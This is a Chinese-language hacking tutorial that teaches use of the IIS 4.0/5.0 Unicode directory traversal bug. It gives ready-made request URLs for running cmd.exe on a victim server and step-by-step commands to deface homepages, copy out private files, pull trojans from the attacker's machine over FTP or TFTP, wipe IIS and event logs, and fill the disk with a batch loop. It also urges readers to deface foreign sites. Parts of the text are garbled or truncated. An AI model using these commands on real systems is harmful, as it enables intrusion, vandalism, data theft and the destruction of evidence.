基础知识之漏洞

今天我们谈谈unicode漏洞，这可是基础中的基础，重点里的重点，不懂的一定要好好学。 

2000年10月17日中联绿盟发布了以下的安全公告： 

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞 

远程漏洞：是 

本地漏洞：是 

发布日期：2000年10月17日 

更新日期：2000年10月17日 

受影响的版本： 

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0 

这可是中国乃至全球网络安全界的一次大变节，入侵nt/2000系统变得如此简单，不打补丁的死路一条。

下面开始正式学习： 

一，UNICODE漏洞的原理 

此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1， 中国台湾繁体中文也同样存在这样的漏洞。 

中文版的WIN2000中，UNICODE编码 存在BUG，在UNICODE 编码中 

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' 

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' 

在NT4中/编码为%c1%9c 

在英文版里： WIN2000英文版%c0%af 

在中文win2k里：%c1%1c 

此外还有多种编码，不一一阐述。 

本文例子均以win2k为准，其他类型请自行替换。

二，由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞） 

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。 

如果成功，那么在浏览区可看到如下信息： 

Directory of C:\inetpub\scripts 

2000-09-28 15:49 〈DIR〉 . 

2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆） 

是不是有自己机器的感觉了，正点！就是这种感觉！ 

cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！ 

http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir （这个命令同样道理） 

大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下： 

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe 

会dos的朋友一定懂其意义了，不懂的请去看书 . 

不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！ 

三，实战演练 

1，修改主页！（是不是很爽？） 

一般主页位置在c:\inetpub\wwwroot下，但要是改了路径，就需要找找了。 

最方便的方法：在浏览器里输入 http://11.11.22.22/.ida要是有漏洞，那在浏?..皇俏颐堑氖籽　?/a> 

分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。 

dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。 

找到了目录，就要对它开刀了！一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm 

那么我们就修改它吧！ 

最方便的方法：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。 

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm 

回应为：HTTP 500 - 内部服务器错误 

通过对cmd的分析，袁哥得出一条简便的方法，加入"符号 

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm 

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm 

回应为：cgi错误，不用理会 

两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧 

而在实际操作中，可能袁哥的方法也会失效，这时，我们就可以copy cmd.exe 为另一个exe，记住路径，用copy后的来echo 

例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe 

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm 

2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，那就应该用改好的主页。

上传，这个我们后面介绍。 

几点忠告： 

1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德 

2，echo前记得帮他们做好备份 

3，不准在主页里加入恶性语句 

2，下载文件 

要是有什么有用的文件被你发现，那我们如何下载呢？ 

最简单的方法：把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。 

别的方法：对不起，没想好：） 

3，最重要的上传 

一般方法：ftp法 

首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧 

echo+open ftp.cshu.com（ftp主机） > c:\hehe.haha 

echo+user yourname >> cc:\hehe.haha (yourname是用户名) 

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码) 

echo+get setup.exe >> c:\hehe.haha 要下载的文件 

echo+quit >> c:\hehe.haha 

完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录） 

别忘了先上传到ftp主机，不要做马大哈哦！ 

最简单的方法：tftp法。 

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件） 

在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：） 

安装好后运行，别忘了设置好默认目录，否则会找不到文件 

tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默认目录里） 

1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！ 

学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样） 

4，如何清除痕迹 

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！ 

C:\winnt\system32\logfiles\*.* 

C:\winnt\ssytem32\config\*.evt 

C:\winnt\system32\dtclog\*.* 

C:\winnt\system32\*.log 

C:\winnt\system32\*.txt 

C:\winnt\*.txt 

C:\winnt\*.log 

全……擦掉！ 

四，细节问题。 

1，遇到长文件名怎么办？ 

c:\program files\ 

就用c:\"program20%files"\ 

2，遇到空格怎么办？
%代替喽，或者xx yy=xxyy~1 
基础知识（5）

%代替喽，或者xx yy=xxyy~1 

3,如何做个很大的文件？ 

目的就是破坏啦！我不喜欢不过教教你们啦 

@echo off 

echo big > c:\a.a 

:h 

copy c:\a.a+c:\a.a c:\a.a 

goto h 

注意不要乱来啊！ 

4，输入命令，没反应或反应不对。 

：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！ 

http://www.exsample.com/scripts/ ... macr;..À 
¯../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:\ 

不一定有用哦！ 

5，如何找到unicode漏洞的主机 

呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：） 

不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！ 

6，我copy，del文件，怎么显示aceess denined? 

这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！ 

这个我会在今后介绍，现在你可以试试attrib 

attrib -r -h -s c:\autoexec.bat 

再对autoexec.bat进行操作，看看有没有效果，成功率不高，不好意思！ 

7，我黑了主页，天下无敌？ 

我本来想对你说：“见你的鬼去吧！”不过想想不大礼貌，有失我绅士风度，所以改个口 

echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！ 

对cshu全体成员来说，不准去改正在建立的网页！这是我们的原则！ 

要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择 

8，我如何做更多的事？ 

第一，努力提高权限 

第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！